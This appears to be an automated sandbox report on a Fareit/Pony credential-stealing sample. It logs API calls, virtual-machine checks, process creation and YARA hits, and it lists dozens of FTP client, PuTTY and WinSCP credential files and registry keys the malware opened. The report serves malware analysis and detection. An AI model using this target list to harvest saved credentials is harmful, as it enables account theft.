Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_00403F86 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_00403F86
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_00409484 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	1_2_00409484
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_00408789 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_00408789
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_1_00404C68 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	1_1_00404C68
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_1_0040890D FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_1_0040890D
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_1_00404FD8 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	1_1_00404FD8
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_1_00403F86 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_1_00403F86
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_1_00409484 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	1_1_00409484
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_1_00408789 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_1_00408789
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_00404C68 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	12_2_00404C68
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_0040890D FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	12_2_0040890D
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_00404FD8 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	12_2_00404FD8
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_00403F86 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	12_2_00403F86
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_00409484 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	12_2_00409484
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_00408789 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	12_2_00408789
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_1_00404C68 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	12_1_00404C68
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_1_0040890D FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	12_1_0040890D
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_1_00404FD8 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	12_1_00404FD8
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_1_00403F86 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	12_1_00403F86
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_1_00409484 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	12_1_00409484
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_1_00408789 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	12_1_00408789

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior

Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652515440.00000000006B4000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: wscript.exe, 00000009.00000003.679883383.000001FD952EA000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c9N
Source: wscript.exe, 00000009.00000003.679883383.000001FD952EA000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f563
Source: Adnexal8.exe, 0000000C.00000002.696538454.00000000006AA000.00000004.00000020.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000002.657163362.0000000000688000.00000004.00000020.sdmp	Binary or memory string: 100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Adnexal8.exe, 0000000C.00000002.696538454.00000000006AA000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

1_2_004106D5

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 0_2_04B41197 mov eax, dword ptr fs:[00000030h]	0_2_04B41197
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 0_2_04B41491 mov eax, dword ptr fs:[00000030h]	0_2_04B41491
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 0_2_04B41280 mov eax, dword ptr fs:[00000030h]	0_2_04B41280
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 0_2_04B400D8 mov ebx, dword ptr fs:[00000030h]	0_2_04B400D8
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 0_2_04B404CA mov eax, dword ptr fs:[00000030h]	0_2_04B404CA
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 0_2_04B4110B mov eax, dword ptr fs:[00000030h]	0_2_04B4110B
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 10_2_04B21491 mov eax, dword ptr fs:[00000030h]	10_2_04B21491
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 10_2_04B21197 mov eax, dword ptr fs:[00000030h]	10_2_04B21197
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 10_2_04B21280 mov eax, dword ptr fs:[00000030h]	10_2_04B21280
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 10_2_04B200D8 mov ebx, dword ptr fs:[00000030h]	10_2_04B200D8
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 10_2_04B204CA mov eax, dword ptr fs:[00000030h]	10_2_04B204CA
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 10_2_04B2110B mov eax, dword ptr fs:[00000030h]	10_2_04B2110B

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: CreateToolhelp32Snapshot,Process32First,StrStrIA,OpenProcess,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle, explorer.exe	1_1_00402C05
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: StrStrIA,OpenProcess,RegOpenCurrentUser,Process32Next,CloseHandle, explorer.exe	1_1_00402D57
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: CreateToolhelp32Snapshot,Process32First,StrStrIA,OpenProcess,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle, explorer.exe	12_1_00402C05
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: StrStrIA,OpenProcess,RegOpenCurrentUser,Process32Next,CloseHandle, explorer.exe	12_1_00402D57

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Code function: 1_2_0041098D lstrcmpiA,LogonUserA,lstrlenA,LCMapStringA,LogonUserA,LogonUserA,LoadUserProfileA,ImpersonateLoggedOnUser,RevertToSelf,UnloadUserProfile,CloseHandle,

1_2_0041098D

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Process created: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe'	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12537875.bat' 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe' '	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Adnexal8.exe 'C:\Users\user\AppData\Roaming\Adnexal8.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Process created: C:\Users\user\AppData\Roaming\Adnexal8.exe 'C:\Users\user\AppData\Roaming\Adnexal8.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12556453.bat' 'C:\Users\user\AppData\Roaming\Adnexal8.exe' '	Jump to behavior

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Code function: 1_2_004042B2 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_004042B2

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,	1_2_004043DD
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,	1_1_004043DD
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,	12_2_004043DD
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,	12_1_004043DD

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Code function: 1_2_004043DD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

1_2_004043DD

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Code function: 1_2_00410B60 OleInitialize,GetUserNameA,

1_2_00410B60

Stealing of Sensitive Information:

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR

Yara detected Fareit stealer

Show sources

Source: Yara match	File source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Adnexal8.exe.4d141c2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTR

Yara detected Pony

Show sources

Source: Yara match	File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\Frigate3\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\FTP Explorer\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\TurboFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_CURRENT_USER\Software\TurboFTP	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\CuteFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBIT	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\BitKinex\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\BitKinex\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_CURRENT_USER\Software\AceBIT	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 9\QCToolbar	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\FileZilla\filezilla.xml	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\BitKinex\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Program Files (x86)\CuteFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\SharedSettings.ccs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\SmartFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\FTP Explorer\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\FTPGetter\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Program Files (x86)\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\CuteFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\CuteFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\SmartFTP\	Jump to behavior
